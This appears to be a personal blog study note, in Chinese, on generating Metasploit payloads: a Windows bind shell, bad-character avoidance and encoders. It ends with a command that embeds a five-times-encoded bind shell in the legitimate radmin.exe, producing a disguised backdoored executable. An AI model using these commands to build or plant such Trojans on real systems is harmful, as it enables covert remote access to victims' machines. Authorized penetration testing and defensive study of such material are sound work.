Kali linux 學習筆記(九十二)metasploit framework——payload 2020.4.25

前言

使用exploit是爲了將payload在目標機上執行

1、payload使用

msfconsole
msf > show payloads #查看可用payload
msf > use payload/windows/shell_bind_tcp #這是個綁定端口shell
msf payload(windows/shell/bind_tcp) > show options #查看設置
msf payload(windows/shell/bind_tcp) > generate  #獲得shellcode,是ruby語言寫的
msf payload(windows/shell/bind_tcp) > generate -h
    Usage: generate [options]
    Generates a payload.
    OPTIONS:
        -E        強制編碼。
        -b <opt>  要避免的字符列表:'\ x00 \ xff'
        -e <opt>  要使用的編碼器模塊的名稱。
        -f <opt>  輸出文件名(否則爲stdout)
        -h        幫助橫幅。
        -i <opt>  編碼迭代的次數。
        -k        保持模板可執行的功能
        -o <opt>  以VAR = VAL格式逗號分隔的選項列表。
        -p <opt>  輸出平臺
        -s <opt>  NOP sled length.
        -t <opt>  輸出格式: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
        -x <opt>  要使用的可執行模板
#繞過壞字符
msf payload(windows/shell/bind_tcp) > generate -b '\x00'
msf payload(windows/shell/bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b' #generate會自動選擇最合適的
#如果要排除的壞字符太多,可能就沒有合適的shellcode了
#手動指定編碼模塊
msf payload(windows/shell/bind_tcp) > show encoders
#注入文件
msf payload(windows/shell/bind_tcp) > generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe

結語

熟悉payload

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章